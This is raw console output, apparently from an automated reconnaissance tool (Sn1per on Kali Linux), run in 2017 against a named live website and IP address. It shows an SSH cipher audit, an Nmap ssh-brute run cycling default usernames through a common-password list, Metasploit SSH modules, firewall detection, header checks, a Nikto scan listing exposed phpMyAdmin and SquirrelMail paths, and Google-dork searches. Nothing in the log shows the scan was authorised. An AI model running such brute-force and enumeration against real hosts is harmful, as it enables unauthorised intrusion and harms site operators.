- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) hmac-md5-96-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 6.6.1)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-md5-etm@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1-96-etm@openssh.com -- mac algorithm to remove
- (rec) -hmac-ripemd160-etm@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5-96-etm@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -umac-128@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
- (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 03:27 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- Nmap scan report for candydollchan.net (91.219.29.120)
- Host is up (0.13s latency).
- rDNS record for 91.219.29.120: 120.29.219.91.colo.ukrservers.com
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- | gssapi-with-mic
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 132 guesses in 195 seconds, average tps: 0.5
- | ssh-hostkey:
- | 2048 2b:d0:38:0e:ca:11:3f:76:6c:5b:84:c1:e6:f2:1b:6c (RSA)
- | 256 2b:b6:42:1b:ac:af:99:36:a4:f0:7b:89:17:bb:ec:81 (ECDSA)
- |_ 256 88:ff:8e:62:bc:e6:75:1c:c0:06:72:75:e6:c4:66:57 (EdDSA)
- |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 2.6.18 (91%), Linux 3.10 (91%), Linux 4.0 (91%), Linux 2.6.39 (91%), Linux 3.10 - 4.8 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.8 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 495.27 ms 10.13.0.1
- 2 ...
- 3 942.09 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 ...
- 5 946.82 ms be100-1108.ams-1-a9.nl.eu (213.186.32.211)
- 6 957.84 ms be100-1166.var-5-a9.pl.eu (91.121.215.191)
- 7 ...
- 8 37.60 ms ae0-1.RT1.NTL.KIV.UA.retn.net (87.245.233.213)
- 9 159.54 ms GW-Fiberax.retn.net (87.245.237.118)
- 10 47.77 ms 195.177.68.94
- 11 47.79 ms runa.lucky.net (193.193.193.45)
- 12 47.78 ms 120.29.219.91.colo.ukrservers.com (91.219.29.120)
- [0m[0mUSER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- [0mRHOSTS => candydollchan.net
- [0m[1m[33m[!][0m RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => candydollchan.net
- [0m[1m[34m[*][0m 91.219.29.120:22 - SSH - Checking for false positives
- [1m[31m[-][0m 91.219.29.120:22 - SSH - throws false positive results. Aborting.
- [1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[0m[1m[31m[-][0m Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
- [0m[0m[1m[32m[+][0m 91.219.29.120:22 - SSH server version: SSH-2.0-OpenSSH_6.6.1 ( service.version=6.6.1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
- [1m[34m[*][0m candydollchan.net:22 - Scanned 1 of 1 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [91m + -- --=[Port 53 closed... skipping.[0m
- [91m + -- --=[Port 79 closed... skipping.[0m
- [93m + -- --=[Port 80 opened... running tests...[0m
- [92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://candydollchan.net
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 13
- [92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
- [1m[34mhttp://candydollchan.net[0m [200 OK] [1m[37mAddThis[0m, [1m[37mCountry[0m[[37mUKRAINE[0m][[1m[31mUA[0m], [1m[37mHTTPServer[0m[[1m[36mnginx/1.10.2[0m], [1m[37mIP[0m[[37m91.219.29.120[0m], [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mCandydoll Downloads - Candydollchan[0m], [1m[37mnginx[0m[[1m[32m1.10.2[0m]
- [94m __ ______ _____ [0m
- [94m \ \/ / ___|_ _|[0m
- [94m \ /\___ \ | | [0m
- [94m / \ ___) || | [0m
- [94m /_/\_|____/ |_| [0m
- [94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
- [94m+ -- --=[Target: candydollchan.net:80[0m
- [92m+ -- --=[Site not vulnerable to Cross-Site Tracing![0m
- [92m+ -- --=[Site not vulnerable to Host Header Injection![0m
- [92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
- [94m+ -- --=[Checking if X-Content options are enabled on candydollchan.net...[0m [93m
- [94m+ -- --=[Checking if X-Frame options are enabled on candydollchan.net...[0m [93m
- [94m+ -- --=[Checking if X-XSS-Protection header is enabled on candydollchan.net...[0m [93m
- [94m+ -- --=[Checking HTTP methods on candydollchan.net...[0m [93m
- Allow: GET,HEAD,POST,OPTIONS
- [94m+ -- --=[Checking if TRACE method is enabled on candydollchan.net...[0m [93m
- [94m+ -- --=[Checking for META tags on candydollchan.net...[0m [93m
- <meta http-equiv="Pragma" content="no-cache" />
- <meta http-equiv="cache-control" content="no-cache" />
- <meta name="Robots" content="index,follow">
- <meta http-equiv="expires" content="Sat, 17 Mar 1990 00:00:01 GMT" />
- <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
- <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
- [94m+ -- --=[Checking for open proxy on candydollchan.net...[0m [93m
- <html><head><title>Shared IP</title></head>
- <body><center>This IP is being shared among many domains.<br>
- To view the domain you are looking for, simply enter the domain name in the location bar of your web browser.<br>
- </center></body>
- </html>
- [94m+ -- --=[Enumerating software on candydollchan.net...[0m [93m
- Server: nginx/1.10.2
- [94m+ -- --=[Checking if Strict-Transport-Security is enabled on candydollchan.net...[0m [93m
- [94m+ -- --=[Checking for Flash cross-domain policy on candydollchan.net...[0m [93m
- [94m+ -- --=[Checking for Silverlight cross-domain policy on candydollchan.net...[0m [93m
- [94m+ -- --=[Checking for HTML5 cross-origin resource sharing on candydollchan.net...[0m [93m
- [94m+ -- --=[Retrieving robots.txt on candydollchan.net...[0m [93m
- User-agent: *
- Disallow:
- Host: candydollchan.net
- Sitemap: http://candydollchan.net/sitemap.xml
- [94m+ -- --=[Retrieving sitemap.xml on candydollchan.net...[0m [93m
- </url>
- <url>
- <loc>http://candydollchan.net/res/14.html</loc>
- <changefreq>daily</changefreq>
- </url>
- <url>
- <loc>http://candydollchan.net/res/562.html</loc>
- <changefreq>daily</changefreq>
- </url>
- </urlset>
- [94m+ -- --=[Checking cookie attributes on candydollchan.net...[0m [93m
- [94m+ -- --=[Checking for ASP.NET Detailed Errors on candydollchan.net...[0m [93m
- [0m
- [92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 91.219.29.120
- + Target Hostname: candydollchan.net
- + Target Port: 80
- + Start Time: 2017-10-27 03:33:04 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: nginx/1.10.2
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x5d 0x52718ec7f0900
- + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
- + Retrieved x-powered-by header: PHP/5.3.29
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-3268: /lib/: Directory indexing found.
- + OSVDB-3092: /lib/: This might be interesting...
- + Uncommon header 'x-ob_mode' found, with contents: 1
- + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /pma/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3268: /src/: Directory indexing found.
- + Cookie SQMSESSID created without the httponly flag
- + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
- + OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
- + OSVDB-3268: /icons/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- + OSVDB-3268: /pt/: Directory indexing found.
- + OSVDB-3092: /pt/: This might be interesting... potential country code (Portugal)
- + Cookie proton created without the httponly flag
- + Cookie fav created without the httponly flag
- + /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
- + 9220 requests: 0 error(s) and 24 item(s) reported on remote host
- + End Time: 2017-10-27 04:56:53 (GMT-4) (5029 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- [92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
- [91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/candydollchan.net-port80.jpg
- [92m + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +[0m
- [92m + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +[0m
- [1;39m _____ [1;37m .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. [0;31m.1BR'''Yp, .8BR'''Cq.
- [1;39m (_____)[1;37m 01 01N. C 01 C 01 .01. 01 [1;31m 01 Yb 01 .01.
- [1;39m (() ())[1;37m 01 C YCb C 01 C 01 ,C9 01 [0;31m 01 dP 01 ,C9
- [1;39m \ / [1;37m 01 C .CN. C 01 C 0101dC9 01 [1;31m 01'''bg. 0101dC9
- [1;39m \ / [1;37m 01 C .01.C 01 C 01 YC. 01 , [0;31m 01 .Y 01 YC.
- [1;39m /=\ [1;37m 01 C Y01 YC. ,C 01 .Cb. 01 ,C [1;31m 01 ,9 01 .Cb.
- [1;39m [___] [1;37m .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C [0;31m.J0101Cd9 .J01L. .J01./ [1;37m2.1
- [1;37m__[ ! ] Neither war between hackers, nor peace for the system.
- [1;37m__[ ! ] [02;31mhttp://blog.inurl.com.br
- [1;37m__[ ! ] [02;31mhttp://fb.com/InurlBrasil
- [1;37m__[ ! ] [02;31mhttp://twitter.com/@googleinurl[0m
- [1;37m__[ ! ] [02;31mhttp://github.com/googleinurl[0m
- [1;37m__[ ! ] [02;31mCurrent PHP version::[ [1;37m7.0.22-3 [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent script owner::[ [1;37mroot [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent uname::[ [1;37mLinux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-2kali1 (2017-10-16) x86_64 [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent pwd::[ [1;37m/usr/share/sniper [02;31m][0m
- [1;37m__[ ! ] [1;33mHelp: php inurlbr.php --help[0m
- [1;37m------------------------------------------------------------------------------------------------------------------------[0m
- [1;37m[ ! ] Starting SCANNER INURLBR 2.1 at [27-10-2017 04:57:52][0;37m
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program[0m
- [1;37m[ INFO ][02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-candydollchan.net.txt ][0m
- [1;37m[ INFO ][0m[02;31m[ DORK ]::[1;37m[ site:candydollchan.net ]
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [1;37m{[0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE - www.google.nr ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE API ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE_GENERIC_RANDOM - www.google.com.af ID: 006688160405527839966:yhpefuwybre ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0;31m[ TOTAL FOUND VALUES ]::[1;37m [ 0 ][0m
- [1;37m[ INFO ][1;33m Not a satisfactory result was found![0m
- [1;37m[ INFO ] [ Shutting down ][0m
- [1;37m[ INFO ] [ End of process INURLBR at [27-10-2017 04:58:03][0m
- [1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 0 ][0m
- [1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-candydollchan.net.txt ][0m
- [1;37m|_________________________________________________________________________________________[0m
- [1;37m\_________________________________________________________________________________________/[0m
- [91m + -- --=[Port 110 closed... skipping.[0m
- [91m + -- --=[Port 111 closed... skipping.[0m
- [91m + -- --=[Port 135 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 161 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [91m + -- --=[Port 443 closed... skipping.[0m
- [91m + -- --=[Port 445 closed... skipping.[0m
- [91m + -- --=[Port 512 closed... skipping.[0m
- [91m + -- --=[Port 513 closed... skipping.[0m
- [91m + -- --=[Port 514 closed... skipping.[0m
- [91m + -- --=[Port 623 closed... skipping.[0m
- [91m + -- --=[Port 624 closed... skipping.[0m
- [91m + -- --=[Port 1099 closed... skipping.[0m
- [91m + -- --=[Port 1433 closed... skipping.[0m
- [91m + -- --=[Port 2049 closed... skipping.[0m
- [91m + -- --=[Port 2121 closed... skipping.[0m
- [91m + -- --=[Port 3306 closed... skipping.[0m
- [91m + -- --=[Port 3310 closed... skipping.[0m
- [91m + -- --=[Port 3128 closed... skipping.[0m
- [91m + -- --=[Port 3389 closed... skipping.[0m
- [91m + -- --=[Port 3632 closed... skipping.[0m
- [91m + -- --=[Port 4443 closed... skipping.[0m
- [91m + -- --=[Port 5432 closed... skipping.[0m
- [91m + -- --=[Port 5800 closed... skipping.[0m
- [91m + -- --=[Port 5900 closed... skipping.[0m
- [91m + -- --=[Port 5984 closed... skipping.[0m
- [91m + -- --=[Port 6000 closed... skipping.[0m
- [91m + -- --=[Port 6667 closed... skipping.[0m
- [91m + -- --=[Port 8000 closed... skipping.[0m
- [91m + -- --=[Port 8100 closed... skipping.[0m
- [91m + -- --=[Port 8080 closed... skipping.[0m
- [91m + -- --=[Port 8180 closed... skipping.[0m
- [91m + -- --=[Port 8443 closed... skipping.[0m
- [91m + -- --=[Port 8888 closed... skipping.[0m
- [91m + -- --=[Port 10000 closed... skipping.[0m
- [91m + -- --=[Port 16992 closed... skipping.[0m
- [91m + -- --=[Port 27017 closed... skipping.[0m
- [91m + -- --=[Port 27018 closed... skipping.[0m
- [91m + -- --=[Port 27019 closed... skipping.[0m
- [91m + -- --=[Port 28017 closed... skipping.[0m
- [91m + -- --=[Port 49152 closed... skipping.[0m
- [92m + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +[0m
- #########################################################################################
- oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
- `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
- `888. .8' .88888. Y88bo. 888 8 888 888
- `888.8' .8' `888. `ZY8888o. 888 8 888 888
- `888' .88ooo8888. `0Y88b 888 8 888 888
- 888 .8' `888. oo .d8P `88. .8' `88b d88'
- o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
- Welcome to Yasuo v2.3
- Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
- #########################################################################################
- I, [2017-10-27T04:58:06.006355 #8161] INFO -- : Initiating port scan
